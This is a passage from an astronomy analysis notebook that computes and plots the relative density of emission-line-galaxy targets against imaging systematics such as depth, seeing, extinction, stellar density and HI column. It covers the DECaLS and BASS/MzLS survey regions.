np.zeros(12*nside*nside)\npixlgbm = np.zeros(12*nside*nside)\npixlrdn = np.zeros(12*nside*nside)\npixlgdn = np.zeros(12*nside*nside)\npixlrds = np.zeros(12*nside*nside)\npixlgds = np.zeros(12*nside*nside)\n\nfor pix in rpix[rbml]:\n pixlrbm[pix] += 1.\nprint('randoms done')\nfor pix in dpix[dbml]:\n pixlgbm[pix] += 1.\n\nfor pix in rpix[rdnl]:\n pixlrdn[pix] += 1.\nprint('randoms done')\nfor pix in dpix[ddnl]:\n pixlgdn[pix] += 1.\n \nfor pix in rpix[rdsl]:\n pixlrds[pix] += 1.\nprint('randoms done')\nfor pix in dpix[ddsl]:\n pixlgds[pix] += 1.\n ", "randoms done\nrandoms done\nrandoms done\n" ], [ "slp = -0.35/4000.\nb = 1.1\nws = 1./(slp*hpq['STARDENS']+b)", "_____no_output_____" ], [ "print(len(pixlgds))", "786432\n" ], [ "def plotvshp(r1,d1,sys,rng,gdzm=20,ebvm=0.15,useMCeff=True,correctstar=False,title='',effac=1.,south=True):\n w = hpq['GALDEPTH_Z'] > gdzm\n w &= hpq['EBV'] < ebvm\n if useMCeff:\n w &= mcl > 0\n if sys != 'gdc' and sys != 'rdc' and sys != 'zdc':\n sm = hpq[w][sys]\n else:\n if sys == 'gdc':\n print('g depth, extinction corrected')\n sm = hpq[w]['GALDEPTH_G']*np.exp(-3.214*hpq[w]['EBV'])\n if sys == 'rdc':\n sm = hpq[w]['GALDEPTH_R']*np.exp(-2.165*hpq[w]['EBV'])\n if sys == 'zdc':\n sm = hpq[w]['GALDEPTH_Z']*np.exp(-1.211*hpq[w]['EBV'])\n ds = np.ones(len(d1))\n if correctstar:\n ds = ws\n dmc = np.ones(len(d1))\n if useMCeff:\n dmc = mcl**effac\n hd1 = np.histogram(sm,weights=d1[w]*ds[w]/dmc[w],range=rng)\n hdnoc = np.histogram(sm,weights=d1[w],bins=hd1[1],range=rng)\n #print(hd1)\n hr1 = np.histogram(sm,weights=r1[w],bins=hd1[1],range=rng)\n #print(hr1)\n xl = []\n for i in range(0,len(hd1[0])):\n xl.append((hd1[1][i]+hd1[1][i+1])/2.)\n plt.errorbar(xl,hd1[0]/hr1[0]/(sum(d1[w]*ds[w]/dmc[w])/sum(r1[w])),np.sqrt(hd1[0])/hr1[0]/(lelg/len(relg)),fmt='ko')\n if useMCeff:\n plt.plot(xl,hdnoc[0]/hr1[0]/(sum(d1[w])/sum(r1[w])),'k--')\n print(hd1[0]/hr1[0]/(sum(d1[w]*ds[w]/dmc[w])/sum(r1[w])))\n #plt.title(str(mp)+reg)\n plt.plot(xl,np.ones(len(xl)),'k:')\n plt.ylabel('relative density')\n plt.xlabel(sys)\n plt.ylim(0.7,1.3)\n plt.title(title)\n plt.show() ", "_____no_output_____" ], [ "title = 'DECaLS South'\neffac=2.\nplotvshp(pixlrds,pixlgds,'STARDENS',(0,0.5e4),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'PSFSIZE_G',(.9,2.5),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'PSFSIZE_R',(.8,2.5),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'PSFSIZE_Z',(.8,2.5),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'EBV',(0,0.15),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'gdc',(0,3000),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'rdc',(0,1000),title=title,effac=effac)\nplotvshp(pixlrds,pixlgds,'zdc',(20,200),title=title,effac=effac)", "[1.00834509 0.99913033 1.00091741 0.98982195 0.96729787 0.9540792\n 0.98379748 0.9688327 0.90180147 0.85811363]\n" ], [ "title = 'DECaLS North'\neffac=2.\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*hpq['STARDENS']+b)\ncs = True\n\nplotvshp(pixlrdn,pixlgdn,'STARDENS',(0,0.5e4),title=title,effac=effac,correctstar='')\nplotvshp(pixlrdn,pixlgdn,'PSFSIZE_G',(.8,2.5),title=title,effac=effac,correctstar='')\nplotvshp(pixlrdn,pixlgdn,'PSFSIZE_R',(.8,2.5),title=title,effac=effac)\nplotvshp(pixlrdn,pixlgdn,'PSFSIZE_Z',(.8,2.),title=title,effac=effac)\nplotvshp(pixlrdn,pixlgdn,'EBV',(0,0.15),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrdn,pixlgdn,'gdc',(0,3000),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrdn,pixlgdn,'rdc',(0,1000),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrdn,pixlgdn,'zdc',(20,200),title=title,effac=effac,correctstar=cs)", "[1.04413932 1.01377588 0.95293409 0.91936779 0.87106227 0.83219991\n 0.78996154 0.74278468 0.64426181 0.61386606]\n" ], [ "title = 'BASS/MZLS'\neffac=1.\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*hpq['STARDENS']+b)\ncs = True\n\nplotvshp(pixlrbm,pixlgbm,'STARDENS',(0,0.5e4),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrbm,pixlgbm,'PSFSIZE_G',(.8,2.5),title=title,effac=effac,correctstar='')\nplotvshp(pixlrbm,pixlgbm,'PSFSIZE_R',(.8,2.5),title=title,effac=effac)\nplotvshp(pixlrbm,pixlgbm,'PSFSIZE_Z',(.8,2.),title=title,effac=effac)\n\nplotvshp(pixlrbm,pixlgbm,'EBV',(0,0.15),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrbm,pixlgbm,'gdc',(0,2000),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrbm,pixlgbm,'rdc',(0,1000),title=title,effac=effac,correctstar=cs)\nplotvshp(pixlrbm,pixlgbm,'zdc',(20,200),title=title,effac=effac,correctstar=cs)", "[1.03629782 0.99252015 0.95940507 0.9756098 0.97685887 0.98111145\n 0.96777165 0.97545035 0.9563601 1.02609734]\n" ], [ "'''\nBelow here, directly use data/randoms\n'''", "_____no_output_____" ], [ "#Open files with grids for efficiency and define function to interpolate them (to be improved)\ngrids = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffgridsouth.dat').transpose()\n#grids[3] = grids[3]\ngridn = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffgridnorth.dat').transpose()\n#print(np.mean(gridn[3]))\n#gridn[3] = gridn[3]/np.mean(gridn[3])\ndef interpeff(gsig,rsig,zsig,south=True):\n md = 0\n xg = 0.15\n #if gsig > xg:\n # gsig = .99*xg\n xr = 0.15\n #if rsig > xr:\n # rsig = 0.99*xr\n xz = 0.4\n #if zsig > xz:\n # zsig = 0.99*xz\n ngp = 30\n if south:\n grid = grids\n else:\n grid = gridn\n i = (ngp*gsig/(xg-md)).astype(int)\n j = (ngp*rsig/(xr-md)).astype(int)\n k = (ngp*zsig/(xz-md)).astype(int)\n ind = (i*ngp**2.+j*ngp+k).astype(int)\n #print(i,j,k,ind)\n #print(grid[0][ind],grid[1][ind],grid[2][ind])\n #print(grid[0][ind-1],grid[1][ind-1],grid[2][ind-1])\n #print(grid[0][ind+1],grid[1][ind+1],grid[2][ind+1])\n return grid[3][ind]\n#print(interpeff([0.0],[0.0],[0.0],south=False)) \n#print(interpeff(0.0,0.0,0.0,south=True))\n#print(0.1/.4)\n#print(0.4/30.)\n#grid[2][0]", "_____no_output_____" ], [ "#Get depth values that match those used for efficiency grids\ndepth_keyword=\"PSFDEPTH\"\nR_G=3.214 # http://legacysurvey.org/dr8/catalogs/#galactic-extinction-coefficients\nR_R=2.165\nR_Z=1.211\n\ngsigmad=1./np.sqrt(felg[depth_keyword+\"_G\"])\nrsigmad=1./np.sqrt(felg[depth_keyword+\"_R\"])\nzsigmad=1./np.sqrt(felg[depth_keyword+\"_Z\"])\ngsig = gsigmad*10**(0.4*R_G*felg[\"EBV\"])\nw = gsig >= 0.15\ngsig[w] = 0.99*0.15\nrsig = rsigmad*10**(0.4*R_R*felg[\"EBV\"])\nw = rsig >= 0.15\nrsig[w] = 0.99*0.15\nzsig = zsigmad*10**(0.4*R_Z*felg[\"EBV\"])\nw = zsig >= 0.4\nzsig[w] = 0.99*0.4\n", "/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:7: RuntimeWarning: divide by zero encountered in true_divide\n import sys\n/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:8: RuntimeWarning: divide by zero encountered in true_divide\n \n/usr/common/software/python/3.7-anaconda-2019.07/lib/python3.7/site-packages/ipykernel_launcher.py:9: RuntimeWarning: divide by zero encountered in true_divide\n if __name__ == '__main__':\n" ], [ "print(min(gsig),max(gsig))\neffsouthl = interpeff(gsig,rsig,zsig,south=True)", "0.011088011 0.14999883\n" ], [ "effnorthl = interpeff(gsig,rsig,zsig,south=False)\nplt.hist(effnorthl,bins=100)\nplt.show()", "_____no_output_____" ], [ "effbm = effnorthl[dbml]\nprint(np.mean(effbm))\neffbm = effbm/np.mean(effbm)\nplt.hist(effbm,bins=100)\nplt.show()", "0.9651708193053623\n" ], [ "effdn = effsouthl[ddnl]\nprint(np.mean(effdn))\neffdn = effdn/np.mean(effdn)\nplt.hist(effdn,bins=100)\nplt.show()\n#plt.scatter(felg[dbml]['RA'],felg[dbml]['DEC'],c=effbm)\n#plt.colorbar()\n#plt.show()\neffds = effsouthl[ddsl]\nprint(np.mean(effds))\neffds = effds/np.mean(effds)\nplt.hist(effds,bins=100)\nplt.show()\n", "1.0254885421358475\n" ], [ "stardensg = np.zeros(len(felg))\nprint(len(felg),len(dpix))\nfor i in range(0,len(dpix)):\n if i%1000000==0 : print(i)\n pix = dpix[i]\n stardensg[i] = hpq['STARDENS'][pix]", "47256516 47256516\n0\n1000000\n2000000\n3000000\n4000000\n5000000\n6000000\n7000000\n8000000\n9000000\n10000000\n11000000\n12000000\n13000000\n14000000\n15000000\n16000000\n17000000\n18000000\n19000000\n20000000\n21000000\n22000000\n23000000\n24000000\n25000000\n26000000\n27000000\n28000000\n29000000\n30000000\n31000000\n32000000\n33000000\n34000000\n35000000\n36000000\n37000000\n38000000\n39000000\n40000000\n41000000\n42000000\n43000000\n44000000\n45000000\n46000000\n47000000\n" ], [ "stardensr = np.zeros(len(relg))\nprint(len(relg),len(rpix))\nfor i in range(0,len(rpix)):\n if i%1000000==0 : print(i)\n pix = rpix[i]\n stardensr[i] = hpq['STARDENS'][pix] ", "64567641 64567641\n0\n1000000\n2000000\n3000000\n4000000\n5000000\n6000000\n7000000\n8000000\n9000000\n10000000\n11000000\n12000000\n13000000\n14000000\n15000000\n16000000\n17000000\n18000000\n19000000\n20000000\n21000000\n22000000\n23000000\n24000000\n25000000\n26000000\n27000000\n28000000\n29000000\n30000000\n31000000\n32000000\n33000000\n34000000\n35000000\n36000000\n37000000\n38000000\n39000000\n40000000\n41000000\n42000000\n43000000\n44000000\n45000000\n46000000\n47000000\n48000000\n49000000\n50000000\n51000000\n52000000\n53000000\n54000000\n55000000\n56000000\n57000000\n58000000\n59000000\n60000000\n61000000\n62000000\n63000000\n64000000\n" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),weights=1./effbm*ws,range=(0,2000))\nhr1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])\n#no correction\nhgn1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),bins=hg1[1])\nhrn1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])", "_____no_output_____" ], [ "#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\nhg2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),weights=1./effdn**2.*ws,range=(0,3000))\nhr2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])\n\nhgn2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),bins=hg2[1])\nhrn2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])", "_____no_output_____" ], [ "#DECaLS S\n#no strong relation with stellar density\nhg3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),weights=1./effds**2.,range=(0,2000))\nhr3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])\n\nhgn3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),bins=hg3[1])\nhrn3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hrn1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hrn2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hrn3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_G*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(felg[dbml]['GALDEPTH_R']*np.exp(-1.*R_R*felg[dbml]['EBV']),weights=1./effbm*ws,range=(0,500))\nhr1 = np.histogram(relg[rbml]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rbml]['EBV']),bins=hg1[1])\nhgn1 = np.histogram(felg[dbml]['GALDEPTH_R']*np.exp(-1.*R_R*felg[dbml]['EBV']),bins=hg1[1])\n", "_____no_output_____" ], [ "#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = np.histogram(felg[ddnl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddnl]['EBV']),weights=1./effdn**2.*ws,range=(0,1000))\nhgn2 = np.histogram(felg[ddnl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddnl]['EBV']),bins=hg2[1])\nhr2 = np.histogram(relg[rdnl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdnl]['EBV']),bins=hg2[1])", "_____no_output_____" ], [ "#DECaLS S\nhg3 = np.histogram(felg[ddsl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsl]['EBV']),weights=1./effds**2.,range=(0,1000))\nhgn3 = np.histogram(felg[ddsl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsl]['EBV']),bins=hg3[1])\nhr3 = np.histogram(relg[rdsl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdsl]['EBV']),bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_R*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),weights=1./effbm*ws,range=(0,200))\nhgn1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),bins=hg1[1])\nhr1 = np.histogram(relg[rbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rbml]['EBV']),bins=hg1[1])", "_____no_output_____" ], [ "#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),weights=1./effdn**2.*ws,range=(0,200))\nhgn2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),bins=hg2[1])\nhr2 = np.histogram(relg[rdnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdnl]['EBV']),bins=hg2[1])", "_____no_output_____" ], [ "#DECaLS S\nhg3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsl]['EBV']),weights=1./effds**2.,range=(0,200))\nhgn3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsl]['EBV']),bins=hg3[1])\nhr3 = np.histogram(relg[rdsl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdsl]['EBV']),bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('GALDEPTH_Z*MWTRANS')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(stardensg[dbml],weights=1./effbm,range=(0,5000))\nhgn1 = np.histogram(stardensg[dbml],bins=hg1[1])\nhr1 = np.histogram(stardensr[rbml],bins=hg1[1])\n#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = np.histogram(stardensg[ddnl],weights=1./effdn**2.,range=(0,5000))\nhgn2 = np.histogram(stardensg[ddnl],bins=hg2[1])\nhr2 = np.histogram(stardensr[rdnl],bins=hg2[1])\n\n#DECaLS S\nhg3 = np.histogram(stardensg[ddsl],weights=1./effds**2.,range=(0,5000))\nhgn3 = np.histogram(stardensg[ddsl],bins=hg3[1])\nhr3 = np.histogram(stardensr[rdsl],bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm3,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('Stellar Density')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC correction, points are after')\nplt.show()", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(felg[dbml]['EBV'],weights=1./effbm*ws,range=(0,0.15))\nhgn1 = np.histogram(felg[dbml]['EBV'],bins=hg1[1])\nhr1 = np.histogram(relg[rbml]['EBV'],bins=hg1[1])\n#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = np.histogram(felg[ddnl]['EBV'],weights=1./effdn**2.*ws,range=(0,0.15))\nhgn2 = np.histogram(felg[ddnl]['EBV'],bins=hg2[1])\nhr2 = np.histogram(relg[rdnl]['EBV'],bins=hg2[1])\n\n#DECaLS S\nhg3 = np.histogram(felg[ddsl]['EBV'],weights=1./effds**2.,range=(0,0.15))\nhgn3 = np.histogram(felg[ddsl]['EBV'],bins=hg3[1])\nhr3 = np.histogram(relg[rdsl]['EBV'],bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('E(B-V)')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "_____no_output_____" ], [ "nh1 = fits.open('NHI_HPX.fits.gz')[1].data['NHI']", "_____no_output_____" ], [ "#make data column\nthphi = radec2thphi(felg['RA'],felg['DEC'])\nr = hp.Rotator(coord=['C','G'],deg=False)\nthphiG = r(thphi[0],thphi[1])\npixhg = hp.ang2pix(1024,thphiG[0],thphiG[1])\nh1g = np.zeros(len(felg))\nfor i in range(0,len(pixhg)):\n h1g[i] = np.log(nh1[pixhg[i]])\n if i%1000000==0 : print(i)", "0\n1000000\n2000000\n3000000\n4000000\n5000000\n6000000\n7000000\n8000000\n9000000\n10000000\n11000000\n12000000\n13000000\n14000000\n15000000\n16000000\n17000000\n18000000\n19000000\n20000000\n21000000\n22000000\n23000000\n24000000\n25000000\n26000000\n27000000\n28000000\n29000000\n30000000\n31000000\n32000000\n33000000\n34000000\n35000000\n36000000\n37000000\n38000000\n39000000\n40000000\n41000000\n42000000\n43000000\n44000000\n45000000\n46000000\n47000000\n" ], [ "#make random column\nthphi = radec2thphi(relg['RA'],relg['DEC'])\nr = hp.Rotator(coord=['C','G'],deg=False)\nthphiG = r(thphi[0],thphi[1])\npixhg = hp.ang2pix(1024,thphiG[0],thphiG[1])\nh1r = np.zeros(len(relg))\nfor i in range(0,len(pixhg)):\n h1r[i] = np.log(nh1[pixhg[i]])\n if i%1000000==0 : print(i)", "0\n1000000\n2000000\n3000000\n4000000\n5000000\n6000000\n7000000\n8000000\n9000000\n10000000\n11000000\n12000000\n13000000\n14000000\n15000000\n16000000\n17000000\n18000000\n19000000\n20000000\n21000000\n22000000\n23000000\n24000000\n25000000\n26000000\n27000000\n28000000\n29000000\n30000000\n31000000\n32000000\n33000000\n34000000\n35000000\n36000000\n37000000\n38000000\n39000000\n40000000\n41000000\n42000000\n43000000\n44000000\n45000000\n46000000\n47000000\n48000000\n49000000\n50000000\n51000000\n52000000\n53000000\n54000000\n55000000\n56000000\n57000000\n58000000\n59000000\n60000000\n61000000\n62000000\n63000000\n64000000\n" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 1./(slp*stardensg[dbml]+b)\nhg1 = np.histogram(h1g[dbml],weights=1./effbm*ws)\nhgn1 = np.histogram(h1g[dbml],bins=hg1[1])\nhr1 = np.histogram(h1r[rbml],bins=hg1[1])\n#DECaLS N\nslp = -0.35/4000.\nb = 1.1\nws = 1./(slp*stardensg[ddnl]+b)\n\nhg2 = np.histogram(h1g[ddnl],weights=1./effdn**2.*ws)\nhgn2 = np.histogram(h1g[ddnl],bins=hg2[1])\nhr2 = np.histogram(h1r[rdnl],bins=hg2[1])\n\n#DECaLS S\nhg3 = np.histogram(h1g[ddsl],weights=1./effds**2.)\nhgn3 = np.histogram(h1g[ddsl],bins=hg3[1])\nhr3 = np.histogram(h1r[rdsl],bins=hg3[1])", "_____no_output_____" ], [ "xl1 = []\nxl2 = []\nxl3 = []\nfor i in range(0,len(hg1[0])):\n xl1.append((hg1[1][i]+hg1[1][i+1])/2.)\n xl2.append((hg2[1][i]+hg2[1][i+1])/2.)\n xl3.append((hg3[1][i]+hg3[1][i+1])/2.)\nnorm1 = sum(hg1[0])/sum(hr1[0]) \nplt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')\nplt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')\nnorm2 = sum(hg2[0])/sum(hr2[0])\nplt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')\nplt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')\nnorm3 = sum(hg3[0])/sum(hr3[0])\nplt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')\nplt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')\nplt.ylim(.7,1.3)\nplt.xlabel('ln(HI)')\nplt.ylabel('relative density')\nplt.legend((['bmzls','DECaLS N','DECaLS S']))\nplt.plot(xl2,np.ones(len(xl2)),'k--')\nplt.title('dashed is before MC+stellar density correction, points are after')\nplt.show()", "_____no_output_____" ], [ "a = np.random.rand(len(relg))\nw = a < 0.01\nplt.plot(h1r[w],relg[w]['EBV'],'.k')\nplt.show()", "_____no_output_____" ], [ "a,b = np.histogram(h1r,weights=relg['EBV'])\nc,d = np.histogram(h1r,bins=b)\nprint(a)\nprint(c)\n", "[6.70024597e+02 2.02695586e+04 1.11988445e+05 2.41894156e+05\n 3.42473594e+05 5.88525938e+05 7.55287500e+05 4.73316500e+05\n 1.13679469e+05 3.10282480e+04]\n[ 91427 2069447 8104081 11966951 11801914 13830959 11109112 4599702\n 789186 204862]\n" ], [ "plt.plot(0.008*np.exp(np.array(xl3)-45.5),(a/c))\nplt.plot(a/c,a/c,'--')\nplt.show()", "_____no_output_____" ], [ "dhg = felg['EBV']-0.008*np.exp(h1g-45.5)", "_____no_output_____" ], [ "dhr = relg['EBV']-0.008*np.exp(h1r-45.5)", "_____no_output_____" ], [ "#bmzls\nslp = -0.2/4000.\nb = 1.1\nws = 